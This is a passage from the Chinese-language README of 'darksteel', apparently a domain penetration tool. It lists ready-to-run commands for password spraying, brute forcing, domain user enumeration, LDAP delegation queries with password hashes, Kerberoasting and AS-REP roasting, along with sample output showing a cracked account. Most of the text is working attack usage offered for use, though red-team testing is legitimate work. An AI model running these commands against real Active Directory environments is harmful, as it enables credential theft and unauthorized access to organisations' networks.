  14. Done! Tested logins in 0.013 seconds
4、使用用户名密码对应字典爆破
  1. darksteel.exe blast -m userpass -d 192.168.1.1 -n test.com -F userpass.txt
  2.  ____    ______  ____    __  __   ____    ______  ____    ____    __       
  3. /\  _`\ /\  _  \/\  _`\ /\ \/\ \ /\  _`\ /\__  _\/\  _`\ /\  _`\ /\ \      
  4. \ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \    
  5.  \ \ \ \ \ \  __ \ \ ,  /\ \ , <  \/_\__ \  \ \ \ \ \  _\L\ \  _\L\ \ \  _
  6.   \ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\  /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \ 
  7.    \ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/  
  8.     \/___/  \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/  \/_/  \/___/  \/___/  \/___/   
  10.    v1.0.8
  13. [+] SUCCESS:     zz@test.com:123456
  14. Done! Tested logins in 0.010 seconds

其他用法

ldap

支持密码为hash
  1. darksteel ldap -d 192.168.1.1 -n test.com -u administrator -p hash
查询域内单条内容 -m指定
  1. darksteel ldap -d 192.168.1.1 -n test.com -u administrator -p 123456 -m computer
查询所有委派信息 -w指定
  1. darksteel ldap -d 192.168.1.1 -n test.com -u administrator -p 123456 -w all

可选择参数

  1. -o                  保存文件(不包括自定义查询)
  3. -l                  最大查询数(默认所有)
  5. -m                  指定单独查询内容
  7. -w                  指定单独查询委派内容

kerberos

kerberoasting(支持密码为hash)
利用所有用户并输出
  1. darksteel kerberos -d 192.168.1.1 -n test.com -u administrator -p 123 -m kerberoast
利用指定test用户并输出
  1. darksteel kerberos -d 192.168.1.1 -n test.com -u administrator -p 123 -m kerberoast -t test
使用TGT进行认证(只可利用单用户)
  1. darksteel kerberos -d 192.168.1.1 -k 123.kirbi -m kerberoast -t test
asreproast(支持密码为hash)
利用所有用户并输出
  1. darksteel kerberos -d 192.168.1.1 -n test.com -u administrator -p 123 -m asreproast
利用指定test用户并输出
  1. darksteel kerberos -d 192.168.1.1 -n test.com  -m asreproast -t test

可选择参数

  1. -o                  保存文件(不包括自定义查询)
  3. -l                  最大查询数(默认所有)
  5. -e                  选择加密方式(默认rc4
  7. -f                  选择输出爆破格式(默认hashcat

blast

域用户枚举
  1. darksteel blast -m userenum -d 192.168.1.1 -n test.com -U user.txt
密码喷洒
  1. darksteel blast -m passspray -d 192.168.1.1 -n test.com -U user.txt -p 123456
单用户密码爆破
  1. darksteel blast -m blastpass -d 192.168.1.1 -n test.com -u admin -P password.txt
用户对应密码爆破(字典格式 admin:123456)
  1. darksteel blast -m userpass -d 192.168.1.1 -n test.com -F userpassword.txt

可选择参数

  1. -v      输出失败信息
  3. -t      线程设置(默认20
  5. -o      输出文件
  7. blast时如果在域内使用则可以不指定dc。目前ldap查询不支持

TODO

  1. 1、持续添加其他利用方式
  3. 2、添加其他信息搜集内容
  5. 3、修改BUG

Thank

https://github.com/jcmturner/gokrb5

https://github.com/go-ldap/ldap

https://github.com/ropnop/kerbrute